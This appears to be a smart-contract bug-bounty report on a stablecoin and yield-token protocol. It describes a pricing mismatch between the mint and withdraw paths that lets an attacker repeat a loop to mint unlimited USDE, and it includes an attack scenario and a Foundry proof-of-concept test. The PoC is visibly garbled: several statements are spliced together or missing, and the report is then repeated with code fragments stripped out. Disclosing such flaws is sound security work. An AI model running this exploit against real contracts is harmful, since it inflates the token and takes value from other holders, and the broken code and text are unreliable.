In the project README (excerpt below), it states that any conversion from USDE to investToken (EUI) should follow current price, whereas conversion from EUI to USDE should follow previous price. This is such that users depositing USDE or converting EUI does not accrue the yield of the same day.
Current Price - the latest conversion price. This is used when users flip from stablecoinf to invest token, to ensure they do not accrue fees based on yields that were accumulated before depositing.\
Previous Price - we maintain both conversion prices, a current price, and the last price before that in order ensure that users who flip from invest token to stablecoin do not accrue today's yield, but gets yesterday's conversion rate.
However, the implementation of USDE and EUI conversion does not follow these descriptions. Additionally, chaining these vulnerabilities together will result in infinite USDE minting bug (described below).
The implementation of InvestToken::mint uses YieldOracle::previousPrice via the path InvestToken::mint >> InvestToken::convertToAssets >> YieldOracle::sharesToAssets >> YieldOracle::previousPrice. Hence conversions of USDE to EUI will follow previous price, and users will accrue yields on the same day, breaking protocol functionality.
The implementation of InvestToken::withdraw uses YieldOracle::currentPrice via the path InvestToken::withdraw >> InvestToken::convertToShares >> YieldOracle::assetsToShares >> YieldOracle::currentPrice. Hence conversions of EUI to USDE will follow current price, and users will accrue yields on the same day, breaking protocol functionality.
As enforced by YieldOracle.sol#L92, the conversion price between USDE to EUI can only increase and never decrease. Hence, users can call InvestToken::mint to convert USDE to EUI at the lower YieldOracle::previousPrice and immediately call InvestToken::withdraw to convert EUI to USDE at a higher YieldOracle::currentPrice to profit from the price difference. Calling these 2 functions repeatedly allows users to mint infinite USDE for themselves, thus breaking protocol functionality.
Impact: HIGH. Infinite USDE minting bug causes USDE hyperinflation and breaks the USDE token peg.\
Likelihood: HIGH. The attack relies on simple preconditions (described below) and users are incentivized to exploit this bug for a profit.\
Severity: HIGH
Attack Scenario\
The attack relies on the following preconditions.
Attacker starts with some USDE. This is to initiate the chain of minting and withdrawing.
The attacker address is not blacklisted for USDE.
The attacker address is whitelisted for investToken (EUI).
The EUI/USDE price has been increased. For the EUI yield bearing vault, this price increase is inevitable and high likelihood.
The attack path is as follows
Attacker calls InvestToken::mint to convert USDE to EUI at the lower price of YieldOracle::previousPrice.
Attacker immediately calls InvestToken::withdraw to convert EUI back to USDE at the higher price of YieldOracle::currentPrice, thus gaining more USDE.
Attacker repeats step 1 and 2 indefinitely to exploit the infinite USDE minting bug.
Proof of Concept (PoC) File
Place the PoC in a new file and run the following code.
forge test --mt testUSDEInflationBug
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.21;
import {Test, console} from "forge-std/Test.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import {IUSDE} from "src/interfaces/IUSDE.sol";
import {InvestToken} from "src/InvestToken.sol";
import {USDE} from "src/USDE.sol";
import {Validator} from "src/Validator.sol";
import {YieldOracle} from "src/YieldOracle.sol";
contract Audit is Test {
Validator validator;
USDE usde;
YieldOracle yieldOracle;
InvestToken investToken;
address admin = makeAddr("admin");
address attacker = makeAddr("mAlice");
uint256 constant STARTING_AMOUNT = 100e18;
function setUp() public {
// Deploy contracts
// note: project's own deploy script (Deploy.s.sol) and test scripts (EUD.t.sol, InvestToken.sol) do not work out-of-the-box
// the below scripts deploys the contracts following code structure as referenced from the above files with minor corrections
// deploy Validator.sol where admin is DEFAULT_ADMIN_ROLE, WHITELISTER, BLACKLISTER
validator = new Validator(admin, admin, admin);
// deploy USDE.sol where admin is initialOwner
usde = new USDE(validator);
ERC1967Proxy usdeProxy = new ERC1967Proxy(address(usde), abi.encodeCall(usde.initialize, (admin)));
usde = USDE(address(usdeProxy));
// deploy YieldOracle.sol where admin is initialOwner and initialOracle
yieldOracle = new YieldOracle(admin, admin);
// deploy InvestToken.sol where admin is initialOwner
investToken = new InvestToken(validator, IUSDE(address(usde)));
ERC1967Proxy euiProxy =
new ERC1967Proxy(address(investToken), abi.encodeCall(investToken.initialize, ("Eurodollar Invest Token", "EUI", admin, yieldOracle)));
investToken = InvestToken(address(euiProxy));
// Grant roles
// note: InvestToken contract requires MINT_ROLE and BURN_ROLE for USDE contract
// so that the InvestToken contract ERC-4626 functions work correctly
usde.grantRole(usde.MINT_ROLE(), address(investToken));
usde.grantRole(usde.BURN_ROLE(), address(investToken));
// Attack Preconditions
// Condition 1: Attacker starts with some USDE
// simulated here by admin minting some USDE to attacker
// auditor's note: deal(address(usde), attacker, STARTING_AMOUNT); does not work
// as it will set totalSupply to type(uint256).max, causing overflow on further USDE minting
usde.grantRole(usde.MINT_ROLE(), admin);, STARTING_AMOUNT);
// Condition 2: Attacker is not blacklisted for USDE
// Condition 3: Attacker is whitelisted for investToken (EUI)
// Condition 4: Price has been updated (increased)
// admin acts as the initialOracle for YieldOracle contract
// warps blockchain forward for updateDelay
vm.warp(block.timestamp + yieldOracle.updateDelay() + 1);
// oracle(admin) updates price within allowable bounds
uint256 updatedPrice = 1.1e18;
// warps blockchain forward for commitDelay
vm.warp(block.timestamp + yieldOracle.commitDelay() + 1);
// commitPrice to set new updated currentPrice
console.log("previousPrice: ", yieldOracle.previousPrice());
console.log("currentPrice: ", yieldOracle.currentPrice());
function testUSDEInflationBug() public {
console.log ("Initial Condition");
uint256 previousPrice = yieldOracle.previousPrice();
uint256 attackerInitialUSDEBalance = usde.balanceOf(attacker);
console.log ("Attacker USDE balance: ", usde.balanceOf(attacker));
console.log ("Attacker EUI balance: ", investToken.balanceOf(attacker));
// Attacker balance: 100 USDE, 0 EUI
// Attack Step 1: Call mint to invest USDE for investToken (EUI)
// EUI is valued at previousPrice for mint function
uint256 sharesToMint = attackerInitialUSDEBalance * 1e18 / previousPrice;
usde.approve(address(investToken), attackerInitialUSDEBalance);, attacker);
console.log ("Invest USDE for investToken (EUI)");
console.log ("Attacker USDE balance: ", usde.balanceOf(attacker));
console.log ("Attacker EUI balance: ", investToken.balanceOf(attacker));
// Attacker balance: 0 USDE, 100 EUI
// Attack Step 2: Calling withdraw to redeem investToken (EUI) for USDE
// EUI is at currentPrice for withdraw function
uint256 currentPrice = yieldOracle.currentPrice();
uint256 assetsToWithdraw = investToken.balanceOf(attacker) * currentPrice / 1e18;
investToken.withdraw(assetsToWithdraw, attacker, attacker);
uint256 attackerFinalUSDEBalance = usde.balanceOf(attacker);
console.log ("Redeem investToken (EUI) for USDE");
console.log ("Attacker USDE balance: ", usde.balanceOf(attacker));
console.log ("Attacker EUI balance: ", investToken.balanceOf(attacker));
// Attacker balance: 110 USDE, 0 EUI
// Attack Step 3: Repeat mint and withdraw function calls for USDE inflation bug
assertGt(attackerFinalUSDEBalance, attackerInitialUSDEBalance);
Revised Code File (Optional)
The infinite USDE minting bug is caused by the bad pricing mechanism of InvestToken::mint and InvestToken::withdraw. Fixing these pricing issues by using separate EUI/USDE conversion functions for previousPrice and currentPrice will resolve the bug.
Github username: @ Twitter username: - Submission hash (on-chain): 0xb72a6644f5dae04e00be541698dc46f7e22fbc58dffdf60825b0ce88a938ba80 Severity: high
Description: Description\ In the project README (excerpt below), it states that any conversion from USDE to investToken (EUI) should follow current price, whereas conversion from EUI to USDE should follow previous price. This is such that users depositing USDE or converting EUI does not accrue the yield of the same day.
However, the implementation of USDE and EUI conversion does not follow these descriptions. Additionally, chaining these vulnerabilities together will result in infinite USDE minting bug (described below).
The implementation of
via the pathInvestToken::mint
. Hence conversions of USDE to EUI will follow previous price, and users will accrue yields on the same day, breaking protocol functionality.The implementation of
via the pathInvestToken::withdraw
. Hence conversions of EUI to USDE will follow current price, and users will accrue yields on the same day, breaking protocol functionality.As enforced by YieldOracle.sol#L92, the conversion price between USDE to EUI can only increase and never decrease. Hence, users can call
to convert USDE to EUI at the lowerYieldOracle::previousPrice
and immediately callInvestToken::withdraw
to convert EUI to USDE at a higherYieldOracle::currentPrice
to profit from the price difference. Calling these 2 functions repeatedly allows users to mint infinite USDE for themselves, thus breaking protocol functionality.Impact\ Impact: HIGH. Infinite USDE minting bug causes USDE hyperinflation and breaks the USDE token peg.\ Likelihood: HIGH. The attack relies on simple preconditions (described below) and users are incentivized to exploit this bug for a profit.\ Severity: HIGH
Attack Scenario\ The attack relies on the following preconditions.
The attack path is as follows
to convert USDE to EUI at the lower price ofYieldOracle::previousPrice
to convert EUI back to USDE at the higher price ofYieldOracle::currentPrice
, thus gaining more USDE.Attachments
Place the PoC in a new file and run the following code.
The infinite USDE minting bug is caused by the bad pricing mechanism of
. Fixing these pricing issues by using separate EUI/USDE conversion functions forpreviousPrice
will resolve the bug.Modifications to YieldOracle.sol
Modifications to InvestToken.sol